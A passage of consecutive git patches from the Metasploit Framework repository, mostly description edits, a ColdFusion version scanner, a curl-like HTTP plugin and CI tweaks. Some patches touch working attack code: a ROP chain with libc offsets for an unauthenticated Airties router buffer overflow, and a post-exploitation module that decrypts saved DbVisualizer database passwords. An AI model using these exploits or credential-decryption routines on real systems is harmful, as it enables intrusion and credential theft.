diff --git a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb
index 5cd2e640cd..b69b8872f1 100644
--- a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb
+++ b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb
@@ -19,10 +19,6 @@ class Metasploit3 < Msf::Auxiliary
         This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), a
         vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code
         execution. This module will try to cause a denial-of-service.
-
-        Please note that a valid file resource must be supplied for the TARGETURI option.
-        By default, IIS provides 'welcome.png' and 'iis-85.png' as resources.
-        Others may also exist, depending on configuration options.
       },
       'Author'         =>
         [

From 2a260f0689f1d35e8f5243eaf6678c89df448e57 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 28 May 2015 15:18:05 -0500
Subject: [PATCH 0222/1013] Update description

---
 .../multi/browser/adobe_flash_net_connection_confusion.rb      | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
index 04360a9b08..8412136cf0 100644
--- a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
+++ b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
@@ -21,7 +21,8 @@ class Metasploit3 < Msf::Exploit::Remote
         vectors, and finally accomplish remote code execution. This module has been tested
         successfully on:
         * Windows 7 SP1 (32-bit) with IE 8, IE11 and Adobe Flash 16.0.0.305
-        * Linux Mint "Rebecca" (32 bits) with Firefox 33.0 and Adobe Flash 11.2.202.404
+        * Linux Mint "Rebecca" (32 bits), and Ubuntu 14.04.2 LTS with Firefox 33.0 and
+          Adobe Flash 11.2.202.404.
       },
       'License'             => MSF_LICENSE,
       'Author'              =>

From 80c3022dc14d3bd48085d8891a3f13f3d4359115 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 28 May 2015 15:39:14 -0500
Subject: [PATCH 0223/1013] Deprecate cold_fusion_version. Please use
 coldfusion_version.

auxiliary/scanner/http/cold_fusion_version is deprecated. Please use
auxiliary/scanner/http/coldfusion_version instead.
---
 .../scanner/http/cold_fusion_version.rb       |   3 +
 .../scanner/http/coldfusion_version.rb        | 127 ++++++++++++++++++
 2 files changed, 130 insertions(+)
 create mode 100644 modules/auxiliary/scanner/http/coldfusion_version.rb

diff --git a/modules/auxiliary/scanner/http/cold_fusion_version.rb b/modules/auxiliary/scanner/http/cold_fusion_version.rb
index b27972d810..ef320c9026 100644
--- a/modules/auxiliary/scanner/http/cold_fusion_version.rb
+++ b/modules/auxiliary/scanner/http/cold_fusion_version.rb
@@ -10,6 +10,9 @@ class Metasploit3 < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient
   include Msf::Auxiliary::Scanner
   include Msf::Auxiliary::Report
+  include Msf::Module::Deprecated
+
+  deprecated(Date.new(2015, 6, 28), 'auxiliary/scanner/http/coldfusion_version')
 
   def initialize
     super(
diff --git a/modules/auxiliary/scanner/http/coldfusion_version.rb b/modules/auxiliary/scanner/http/coldfusion_version.rb
new file mode 100644
index 0000000000..b27972d810
--- /dev/null
+++ b/modules/auxiliary/scanner/http/coldfusion_version.rb
@@ -0,0 +1,127 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize
+    super(
+      'Name'        => 'ColdFusion Version Scanner',
+      'Description' => %q{
+        This module attempts identify various flavors of ColdFusion up to version 10
+        as well as the underlying OS.
+      },
+      'Author'      =>
+        [
+          'nebulus',  # Original
+          'sinn3r'    # Fingerprint() patch for Cold Fusion 10
+        ],
+      'License'     => MSF_LICENSE
+    )
+  end
+
+  def fingerprint(response)
+
+    if(response.headers.has_key?('Server') )
+      if(response.headers['Server'] =~ /IIS/ or response.headers['Server'] =~ /\(Windows/)
+        os = "Windows (#{response.headers['Server']})"
+      elsif(response.headers['Server'] =~ /Apache\//)
+        os = "Unix (#{response.headers['Server']})"
+      else
+        os = response.headers['Server']
+      end
+    end
+
+    return nil if response.body.length < 100
+
+    title = "Not Found"
+    if(response.body =~ /<title.*\/?>(.+)<\/title\/?>/im)
+      title = $1
+      title.gsub!(/\s/, '')
+    end
+
+    return nil if( title == 'Not Found' or not title =~ /ColdFusionAdministrator/)
+
+    out = nil
+
+    if(response.body =~ />\s*Version:\s*(.*)<\/strong\><br\s\//)
+      v = $1
+      out = (v =~ /^6/) ? "Adobe ColdFusion MX6 #{v}" : "Adobe ColdFusion MX7 #{v}"
+    elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright 1995\-2012 Adobe/ and response.body =~ /Administrator requires a browser that supports frames/ )
+      out = "Adobe ColdFusion MX7"
+    elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2006 Adobe/)
+      out = "Adobe ColdFusion 8"
+    elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2010 Adobe/ and
+      response.body =~ /1997\-2012 Adobe Systems Incorporated and its licensors/)
+      out = "Adobe ColdFusion 10"
+    elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2010 Adobe/ or
+      response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2009 Adobe Systems\, Inc\. All rights reserved/ or
+      response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1997\-2012 Adobe Systems\, Inc\. All rights reserved/)
+      out = "Adobe ColdFusion 9"
+    elsif(response.body =~ /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/)
+      out = $1.split(/,/)[0]
+    else
+      out = 'Unknown ColdFusion'
+    end
+
+    if(title.downcase == 'coldfusionadministrator')
+      out << " (administrator access)"
+    end
+
+    out << " (#{os})"
+    return out
+  end
+
+  def run_host(ip)
+
+    url = '/CFIDE/administrator/index.cfm'
+
+    res = send_request_cgi({
+      'uri' => url,
+      'method' => 'GET',
+    })
+
+    return if not res or not res.body or not res.code
+    res.body.gsub!(/[\r|\n]/, ' ')
+
+    if (res.code.to_i == 200)
+      out = fingerprint(res)
+      return if not out
+      if(out =~ /^Unknown/)
+        print_status("#{ip} " << out)
+        return
+      else
+        print_good("#{ip}: " << out)
+        report_note(
+          :host  => ip,
+          :port  => datastore['RPORT'],
+          :proto => 'tcp',
+          :ntype => 'cfversion',
+          :data  => out
+        )
+      end
+    elsif(res.code.to_i == 403 and datastore['VERBOSE'])
+      if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
+        print_status("#{ip} denied access to #{url} (SSL Required)")
+      elsif(res.body =~ /has a list of IP addresses that are not allowed/)
+        print_status("#{ip} restricted access by IP")
+      elsif(res.body =~ /SSL client certificate is required/)
+        print_status("#{ip} requires a SSL client certificate")
+      else
+        print_status("#{ip} denied access to #{url} #{res.code} #{res.message}")
+      end
+    end
+
+  rescue OpenSSL::SSL::SSLError
+  rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
+  rescue ::Timeout::Error, ::Errno::EPIPE
+  end
+
+end

From 3ac5088a9ac1c55e7089ac70e87cc7a4de617163 Mon Sep 17 00:00:00 2001
From: root <void-in@users.noreply.github.com>
Date: Fri, 29 May 2015 10:33:55 +0500
Subject: [PATCH 0224/1013] Add decryption.final for proper padding

---
 modules/post/multi/gather/dbvis_enum.rb | 9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)

diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb
index 74bea5de13..a274db370e 100644
--- a/modules/post/multi/gather/dbvis_enum.rb
+++ b/modules/post/multi/gather/dbvis_enum.rb
@@ -7,6 +7,7 @@ require 'msf/core'
 require 'msf/core/auxiliary/report'
 require 'openssl'
 require 'digest/md5'
+require 'base64'
 
 class Metasploit3 < Msf::Post
 
@@ -204,7 +205,7 @@ class Metasploit3 < Msf::Post
         report_host(:host =>  db[:Server]);
       end
 
-      db_table << [ db[:Alias], db[:Type], db[:Server], db[:Port], db[:Database], db[:Namespace], db[:Userid], db[:Password]]
+      db_table << [ db[:Alias], db[:Type], db[:Server], db[:Port], db[:Database], db[:Namespace], db[:Userid], db[:Password] ]
     end
     return db_table
   end
@@ -283,7 +284,7 @@ class Metasploit3 < Msf::Post
           report_host(:host => $1.to_s)
         end
       end
-      db_table << [ db[:Alias] , db[:Type] , db[:Url], db[:Userid] ]
+      db_table << [ db[:Alias] , db[:Type] , db[:Url], db[:Userid], db[:Password] ]
     end
     return db_table
   end
@@ -301,10 +302,10 @@ class Metasploit3 < Msf::Post
     enc_password = Rex::Text.decode_base64(enc_password)
     dk, iv = get_derived_key
     des = OpenSSL::Cipher.new('DES-CBC')
+    des.decrypt
     des.key = dk
     des.iv = iv
-
-    des.update(enc_password)
+    password = des.update(enc_password) + des.final
   end
 
   def get_derived_key

From 101f12b9d20388a6eac6ef674d7710d9b648e2c4 Mon Sep 17 00:00:00 2001
From: root <void-in@users.noreply.github.com>
Date: Fri, 29 May 2015 10:38:06 +0500
Subject: [PATCH 0225/1013] Remove base64 require

---
 modules/post/multi/gather/dbvis_enum.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb
index a274db370e..6ad4f86d38 100644
--- a/modules/post/multi/gather/dbvis_enum.rb
+++ b/modules/post/multi/gather/dbvis_enum.rb
@@ -7,7 +7,6 @@ require 'msf/core'
 require 'msf/core/auxiliary/report'
 require 'openssl'
 require 'digest/md5'
-require 'base64'
 
 class Metasploit3 < Msf::Post
 

From 17c0af638084d5dd92b92e2db5633f84a62b784a Mon Sep 17 00:00:00 2001
From: root <void-in@users.noreply.github.com>
Date: Fri, 29 May 2015 11:08:24 +0500
Subject: [PATCH 0226/1013] Consistent column names

---
 modules/post/multi/gather/dbvis_enum.rb | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)

diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb
index 6ad4f86d38..42bc91d61d 100644
--- a/modules/post/multi/gather/dbvis_enum.rb
+++ b/modules/post/multi/gather/dbvis_enum.rb
@@ -123,7 +123,7 @@ class Metasploit3 < Msf::Post
       "Port",
       "Database",
       "Namespace",
-      "Userid",
+      "UserID",
       "Password"
     ])
 
@@ -166,7 +166,7 @@ class Metasploit3 < Msf::Post
 
         # get the user
         if line =~ /<Userid>([\S+\s+]+)<\/Userid>/i
-          db[:Userid] = $1
+          db[:UserID] = $1
         end
 
         # get user password
@@ -204,7 +204,7 @@ class Metasploit3 < Msf::Post
         report_host(:host =>  db[:Server]);
       end
 
-      db_table << [ db[:Alias], db[:Type], db[:Server], db[:Port], db[:Database], db[:Namespace], db[:Userid], db[:Password] ]
+      db_table << [ db[:Alias], db[:Type], db[:Server], db[:Port], db[:Database], db[:Namespace], db[:UserID], db[:Password] ]
     end
     return db_table
   end
@@ -258,7 +258,7 @@ class Metasploit3 < Msf::Post
 
         # get the user
         if line =~ /<Userid>([\S+\s+]+)<\/Userid>/i
-          db[:Userid] = $1
+          db[:UserID] = $1
         end
 
         #get the user password
@@ -269,7 +269,7 @@ class Metasploit3 < Msf::Post
 
         # get the server URL
         if line =~ /<Url>(\S+)<\/Url>/i
-          db[:Url] = $1
+          db[:URL] = $1
         end
 
       end
@@ -277,13 +277,13 @@ class Metasploit3 < Msf::Post
 
     # Fill the tab
     dbs.each do |db|
-      if (db[:Url] =~ /[\S+\s+]+[\/]+([\S+\s+]+):[\S+]+/i)
+      if (db[:URL] =~ /[\S+\s+]+[\/]+([\S+\s+]+):[\S+]+/i)
         if ::Rex::Socket.is_ipv4?($1.to_s)
           print_good("Reporting #{$1}")
           report_host(:host => $1.to_s)
         end
       end
-      db_table << [ db[:Alias] , db[:Type] , db[:Url], db[:Userid], db[:Password] ]
+      db_table << [ db[:Alias] , db[:Type] , db[:URL], db[:UserID], db[:Password] ]
     end
     return db_table
   end

From 36782af5c9adb0bab7edeb115271df01e0ef0623 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 29 May 2015 10:34:12 -0500
Subject: [PATCH 0227/1013] Resolve #4889, Improve msfvenom -h

Resolve #4889
---
 msfvenom | 14 ++++++++++++--
 1 file changed, 12 insertions(+), 2 deletions(-)

diff --git a/msfvenom b/msfvenom
index 31207897c1..84b71ab4b9 100755
--- a/msfvenom
+++ b/msfvenom
@@ -54,7 +54,10 @@ require 'msf/core/payload_generator'
     opts = {}
     datastore = {}
     opt = OptionParser.new
-    opt.banner = "Usage: #{$0} [options] <var=val>"
+    banner  = "MsfVenom - a Metasploit standalone payload generator.\n"
+    banner << "Also a replacement for msfpayload and msfencode.\n"
+    banner << "Usage: #{$0} [options] <var=val>"
+    opt.banner = banner
     opt.separator('')
     opt.separator('Options:')
 
@@ -292,7 +295,14 @@ if __FILE__ == $0
           $stdout.puts dump_encoders
           $stdout.puts dump_nops
         else
-          $stderr.puts "Invalid module type"
+          if mod == 'payload'
+            question = ". Do you mean 'payloads'?"
+          elsif mod == 'encoder'
+            question = ". Do you mean 'encoders'?"
+          elsif mod == 'nop'
+            quesetion = ". Do you mean 'nops'?"
+          end
+          $stderr.puts "Invalid module type#{question}"
       end
     end
     exit(0)

From 952f391fb4ff688dd1b21785e5f2b7d9424abae7 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 29 May 2015 10:49:51 -0500
Subject: [PATCH 0228/1013] Do minor code cleanup

---
 .../linux/http/airties_login_cgi_bof.rb       | 41 ++++++++++---------
 1 file changed, 21 insertions(+), 20 deletions(-)

diff --git a/modules/exploits/linux/http/airties_login_cgi_bof.rb b/modules/exploits/linux/http/airties_login_cgi_bof.rb
index ece3f68ec9..20e1387e38 100644
--- a/modules/exploits/linux/http/airties_login_cgi_bof.rb
+++ b/modules/exploits/linux/http/airties_login_cgi_bof.rb
@@ -15,17 +15,17 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'Airties login-cgi Buffer Overflow',
       'Description'    => %q{
-        This module exploits an remote buffer overflow vulnerability on several Airties routers.
-        The vulnerability exists in the handling of HTTP queries to the login cgi with
-        long redirect parameter values. The vulnerability can be exploitable without authentication.
-        This module has been tested successfully on Airties firmware AirTies_Air5650v3TT_FW_1.0.2.0.bin
-        in emulation. Other firmware versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453,
-        Air5444TT, Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as vulnerable.
+        This module exploits a remote buffer overflow vulnerability on several Airties routers.
+        The vulnerability exists in the handling of HTTP queries to the login cgi with long
+        redirect parameters. The vulnerability doesn't require authentication. This module has
+        been tested successfully on the AirTies_Air5650v3TT_FW_1.0.2.0.bin firmware with emulation.
+        Other versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453, Air5444TT,
+        Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as vulnerable.
       },
       'Author'         =>
         [
-          'Batuhan Burakcin <batuhan[at]bmicrosystems.com>',   # discovered the vulnerability
-          'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
+          'Batuhan Burakcin <batuhan[at]bmicrosystems.com>', # discovered the vulnerability
+          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
         ],
       'License'        => MSF_LICENSE,
       'Platform'       => ['linux'],
@@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           ['EDB', '36577'],
           ['URL', 'http://www.bmicrosystems.com/blog/exploiting-the-airties-air-series/'], #advisory
-          ['URL', 'http://www.bmicrosystems.com/exploits/airties5650tt.txt'], #PoC
+          ['URL', 'http://www.bmicrosystems.com/exploits/airties5650tt.txt'] #PoC
         ],
       'Targets'        =>
         [
@@ -42,23 +42,24 @@ class Metasploit3 < Msf::Exploit::Remote
             {
               'Offset'         => 359,
               'LibcBase'       => 0x2aad1000,
-              'RestoreReg'     => 0x0003FE20,    # restore s-registers
-              'System'         => 0x0003edff,    # address of system-1
-              'CalcSystem'     => 0x000111EC,    # calculate the correct address of system
-              'CallSystem'     => 0x00041C10,    # call our system
-              'PrepareSystem'  => 0x000215b8,    # prepare $a0 for our system call
+              'RestoreReg'     => 0x0003FE20, # restore s-registers
+              'System'         => 0x0003edff, # address of system-1
+              'CalcSystem'     => 0x000111EC, # calculate the correct address of system
+              'CallSystem'     => 0x00041C10, # call our system
+              'PrepareSystem'  => 0x000215b8  # prepare $a0 for our system call
             }
           ]
         ],
       'DisclosureDate'  => 'Mar 31 2015',
       'DefaultTarget'   => 0))
+
       deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
   end
 
   def check
     begin
       res = send_request_cgi({
-        'uri'     => "/cgi-bin/login",
+        'uri'     => '/cgi-bin/login',
         'method'  => 'GET'
       })
 
@@ -103,16 +104,16 @@ class Metasploit3 < Msf::Exploit::Remote
                  # 0003FE48                 addiu   $sp, 0x48
 
     shellcode << rand_text_alpha_upper(36)                                 # padding
-    shellcode << [target['LibcBase'] + target['System']].pack("N")         # s0 - system address-1
+    shellcode << [target['LibcBase'] + target['System']].pack('N')         # s0 - system address-1
     shellcode << rand_text_alpha_upper(16)                                 # unused registers $s1 - $s4
-    shellcode << [target['LibcBase'] + target['CallSystem']].pack("N")     # $s5 - call system
+    shellcode << [target['LibcBase'] + target['CallSystem']].pack('N')     # $s5 - call system
 
                  # 00041C10                 move    $t9, $s0
                  # 00041C14                 jalr    $t9
                  # 00041C18                 nop
 
     shellcode << rand_text_alpha_upper(8)                                  # unused registers $s6 - $s7
-    shellcode << [target['LibcBase'] + target['PrepareSystem']].pack("N")  # write sp to $a0 -> parameter for call to system
+    shellcode << [target['LibcBase'] + target['PrepareSystem']].pack('N')  # write sp to $a0 -> parameter for call to system
 
                  # 000215B8                 addiu   $a0, $sp, 0x20
                  # 000215BC                 lw      $ra, 0x1C($sp)
@@ -120,7 +121,7 @@ class Metasploit3 < Msf::Exploit::Remote
                  # 000215C4                 addiu   $sp, 0x20
 
     shellcode << rand_text_alpha_upper(28)                                 # padding
-    shellcode << [target['LibcBase'] + target['CalcSystem']].pack("N")     # add 1 to s0 (calculate system address)
+    shellcode << [target['LibcBase'] + target['CalcSystem']].pack('N')     # add 1 to s0 (calculate system address)
 
                  # 000111EC                 move    $t9, $s5
                  # 000111F0                 jalr    $t9
@@ -134,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote
     begin
       res = send_request_cgi({
         'method' => 'POST',
-        'uri'     => "/cgi-bin/login",
+        'uri'     => '/cgi-bin/login',
         'encode_params' => false,
         'vars_post' => {
           'redirect' => shellcode,

From 635a37681dc8ad971eb63ef4add22a22d89bc472 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Fri, 29 May 2015 10:23:54 -0500
Subject: [PATCH 0229/1013] skip checking for deltas in Gemfile.lock with
 bundler 1.10.x

thanks to @firefart for the filter
---
 .travis.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.travis.yml b/.travis.yml
index 2f6072ffd2..8a150bacc2 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -22,7 +22,7 @@ before_script:
   - bundle exec rake db:migrate
 script:
   # fail build if db/schema.rb update is not committed
-  - git diff --exit-code && bundle exec rake $RAKE_TASKS
+  - git diff --exit-code -- . ':!Gemfile.lock' && bundle exec rake $RAKE_TASKS
 sudo: false
 rvm:
   - '2.1.6'

From 00b8dbfe9b72e4dd5722deccc00716463593d4d2 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Fri, 29 May 2015 11:34:25 -0500
Subject: [PATCH 0230/1013] restrict git diff filter to something travis can
 expand

---
 .travis.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.travis.yml b/.travis.yml
index 8a150bacc2..cbc78a6681 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -22,7 +22,7 @@ before_script:
   - bundle exec rake db:migrate
 script:
   # fail build if db/schema.rb update is not committed
-  - git diff --exit-code -- . ':!Gemfile.lock' && bundle exec rake $RAKE_TASKS
+  - git diff --exit-code db/schema.rb && bundle exec rake $RAKE_TASKS
 sudo: false
 rvm:
   - '2.1.6'

From 50b2ae477fa6d19db6cbb30631ce0f07aec365f5 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Thu, 12 Mar 2015 21:07:46 -0400
Subject: [PATCH 0231/1013] Add a plugin for making curl-like http requests

---
 plugins/requests.rb | 202 ++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 202 insertions(+)
 create mode 100644 plugins/requests.rb

diff --git a/plugins/requests.rb b/plugins/requests.rb
new file mode 100644
index 0000000000..3ed8e9045f
--- /dev/null
+++ b/plugins/requests.rb
@@ -0,0 +1,202 @@
+require 'uri'
+
+module Msf
+
+class Plugin::HTTPRequest < Msf::Plugin
+
+  class ConsoleCommandDispatcher
+    include Msf::Ui::Console::CommandDispatcher
+
+    def name
+      'Request'
+    end
+
+    def commands
+      {
+        'http_request' => 'Make an HTTP request'
+      }
+    end
+
+    def parse_args(args)
+      help_line = 'Usage: http_request [options] uri'
+      opt_parser = Rex::Parser::Arguments.new(
+        '-0' => [ false, 'Use HTTP 1.0' ],
+        '-1' => [ false, 'Use TLSv1 (SSL)' ],
+        '-2' => [ false, 'Use SSLv2 (SSL)' ],
+        '-3' => [ false, 'Use SSLv3 (SSL)' ],
+        '-A' => [ true,  'User-Agent to send to server' ],
+        '-d' => [ true,  'HTTP POST data' ],
+        '-G' => [ false, 'Send the -d data with a HTTP GET' ],
+        '-h' => [ false, 'This help text' ],
+        '-H' => [ true,  'Custom header to pass to server' ],
+        '-i' => [ false, 'Include headers in the output' ],
+        '-I' => [ false, 'Show document info only' ],
+        '-o' => [ true,  'Write output to <file> instead of stdout' ],
+        '-u' => [ true,  'Server user and password', ],
+        '-X' => [ true,  'Request method to use' ]
+      )
+
+      options = {
+        :auth_password   => nil,
+        :auth_username   => nil,
+        :headers         => { },
+        :print_body      => true,
+        :print_headers   => false,
+        :method          => nil,
+        :output_file     => nil,
+        :ssl_version     => 'Auto',
+        :uri             => nil,
+        :user_agent      => Rex::Proto::Http::Client::DefaultUserAgent,
+        :version         => '1.1'
+      }
+
+      opt_parser.parse(args) do |opt, idx, val|
+        case opt
+        when '-0'
+          options[:version] = '1.0'
+        when '-1'
+          options[:ssl_version] = 'TLS1'
+        when '-2'
+          options[:ssl_version] = 'SSL2'
+        when '-3'
+          options[:ssl_version] = 'SSL3'
+        when '-A'
+          options[:user_agent] = val
+        when '-d'
+          options[:data] = val
+          options[:method] ||= 'POST'
+        when '-G'
+          options[:method] = 'GET'
+        when '-h'
+          print_line(help_line)
+          print_line(opt_parser.usage)
+          return
+        when '-H'
+          name, _, value = val.partition(':')
+          options[:headers][name] = value.strip
+        when '-i'
+          options[:print_headers]  = true
+        when '-I'
+          options[:print_headers]  = true
+          options[:print_body]     = false
+          options[:method] ||= 'HEAD'
+        when '-o'
+          options[:output_file] = val
+        when '-u'
+          val = val.partition(':')
+          options[:auth_username] = val[0]
+          options[:auth_password] = val[2]
+        when '-X'
+          options[:method] = val
+        else
+          options[:uri] = val
+        end
+      end
+
+      if options[:uri].nil?
+        print_line(help_line)
+        print_line(opt_parser.usage)
+        return
+      end
+
+      options[:method] ||= 'GET'
+      options[:uri] = URI(options[:uri])
+      options
+    end
+
+    def output_line(opts, line)
+      if opts[:output_file].nil?
+        if line[-2..-1] == "\r\n"
+          print_line(line[0..-3])
+        elsif line[-1] == "\n"
+          print_line(line[0..-2])
+        else
+          print_line(line)
+        end
+      else
+        opts[:output_file].write(line)
+      end
+    end
+
+    def cmd_http_request(*args)
+      opts = parse_args(args)
+      return unless opts
+
+      unless opts[:output_file].nil?
+        begin
+          opts[:output_file] = File.new(opts[:output_file], 'w')
+        rescue ::Errno::EACCES, Errno::EISDIR, Errno::ENOTDIR
+          print_error('Failed to open the specified file for output')
+          return
+        end
+      end
+
+      uri = opts[:uri]
+      http_client = Rex::Proto::Http::Client.new(
+        uri.host,
+        uri.port,
+        {'Msf' => framework},
+        uri.scheme == 'https',
+        opts[:ssl_version]
+      )
+
+      begin
+        http_client.connect
+        request = http_client.request_cgi(
+          'agent'    => opts[:user_agent],
+          'data'     => opts[:data],
+          'headers'  => opts[:headers],
+          'method'   => opts[:method],
+          'password' => opts[:auth_password],
+          'query'    => uri.query,
+          'uri'      => uri.path,
+          'username' => opts[:auth_username],
+          'version'  => opts[:version]
+        )
+
+        response = http_client.send_recv(request)
+      rescue ::OpenSSL::SSL::SSLError
+        print_error('Encountered an SSL error')
+      rescue ::Errno::ECONNRESET => ex
+        print_error('The connection was reset by the peer')
+      rescue ::EOFError, Errno::ETIMEDOUT, Rex::ConnectionError, ::Timeout::Error
+        print_error('Encountered an error')
+      rescue ::Exception => ex
+        print_line("An error of type #{ex.class} happened, message is #{ex.message}")
+      ensure
+        http_client.close
+      end
+      return unless response
+
+      if opts[:print_headers]
+        output_line(opts, response.cmd_string)
+        output_line(opts, response.headers.to_s)
+      end
+
+      output_line(opts, response.body) if opts[:print_body]
+      opts[:output_file].close unless opts[:output_file].nil?
+    end
+  end
+
+  def initialize(framework, opts)
+    super
+    add_console_dispatcher(ConsoleCommandDispatcher)
+    print_status("#{name} plugin loaded.")
+  end
+
+  def cleanup
+    remove_console_dispatcher('HTTP Request')
+  end
+
+  def name
+    'Requests'
+  end
+
+  def desc
+    'Make Requests'
+  end
+
+protected
+end
+
+end

From 72650d72b15850de87582847781d813915dbc74e Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Fri, 13 Mar 2015 08:58:17 -0400
Subject: [PATCH 0232/1013] Use an authorization header and fix uri.path

---
 plugins/requests.rb | 16 ++++++++++++----
 1 file changed, 12 insertions(+), 4 deletions(-)

diff --git a/plugins/requests.rb b/plugins/requests.rb
index 3ed8e9045f..874365fcf2 100644
--- a/plugins/requests.rb
+++ b/plugins/requests.rb
@@ -32,7 +32,7 @@ class Plugin::HTTPRequest < Msf::Plugin
         '-i' => [ false, 'Include headers in the output' ],
         '-I' => [ false, 'Show document info only' ],
         '-o' => [ true,  'Write output to <file> instead of stdout' ],
-        '-u' => [ true,  'Server user and password', ],
+        '-u' => [ true,  'Server user and password' ],
         '-X' => [ true,  'Request method to use' ]
       )
 
@@ -140,6 +140,14 @@ class Plugin::HTTPRequest < Msf::Plugin
         opts[:ssl_version]
       )
 
+      unless opts[:auth_username].nil?
+        auth_str = opts[:auth_username].to_s + ':' + opts[:auth_password].to_s
+        auth_str = 'Basic ' + Rex::Text.encode_base64(auth_str)
+        opts[:headers]['Authorization'] = auth_str
+      end
+
+      uri.path = '/' if uri.path.length == 0
+
       begin
         http_client.connect
         request = http_client.request_cgi(
@@ -161,8 +169,8 @@ class Plugin::HTTPRequest < Msf::Plugin
         print_error('The connection was reset by the peer')
       rescue ::EOFError, Errno::ETIMEDOUT, Rex::ConnectionError, ::Timeout::Error
         print_error('Encountered an error')
-      rescue ::Exception => ex
-        print_line("An error of type #{ex.class} happened, message is #{ex.message}")
+      #rescue ::Exception => ex
+      #  print_line("An error of type #{ex.class} happened, message is #{ex.message}")
       ensure
         http_client.close
       end
@@ -193,7 +201,7 @@ class Plugin::HTTPRequest < Msf::Plugin
   end
 
   def desc
-    'Make Requests'
+    'Make HTTP requests from within Metasploit.'
   end
 
 protected

From 2070934758d259730ba699d2c5374aa4f9cb881a Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Fri, 13 Mar 2015 09:36:57 -0400
Subject: [PATCH 0233/1013] Improve output file handling and expand_path

---
 plugins/requests.rb | 16 +++++++++++-----
 1 file changed, 11 insertions(+), 5 deletions(-)

diff --git a/plugins/requests.rb b/plugins/requests.rb
index 874365fcf2..9cc04b19ee 100644
--- a/plugins/requests.rb
+++ b/plugins/requests.rb
@@ -26,7 +26,7 @@ class Plugin::HTTPRequest < Msf::Plugin
         '-3' => [ false, 'Use SSLv3 (SSL)' ],
         '-A' => [ true,  'User-Agent to send to server' ],
         '-d' => [ true,  'HTTP POST data' ],
-        '-G' => [ false, 'Send the -d data with a HTTP GET' ],
+        '-G' => [ false, 'Send the -d data with an HTTP GET' ],
         '-h' => [ false, 'This help text' ],
         '-H' => [ true,  'Custom header to pass to server' ],
         '-i' => [ false, 'Include headers in the output' ],
@@ -81,7 +81,7 @@ class Plugin::HTTPRequest < Msf::Plugin
           options[:print_body]     = false
           options[:method] ||= 'HEAD'
         when '-o'
-          options[:output_file] = val
+          options[:output_file] = File.expand_path(val)
         when '-u'
           val = val.partition(':')
           options[:auth_username] = val[0]
@@ -174,7 +174,11 @@ class Plugin::HTTPRequest < Msf::Plugin
       ensure
         http_client.close
       end
-      return unless response
+
+      unless response
+        opts[:output_file].close unless opts[:output_file].nil?
+        return
+      end
 
       if opts[:print_headers]
         output_line(opts, response.cmd_string)
@@ -182,14 +186,16 @@ class Plugin::HTTPRequest < Msf::Plugin
       end
 
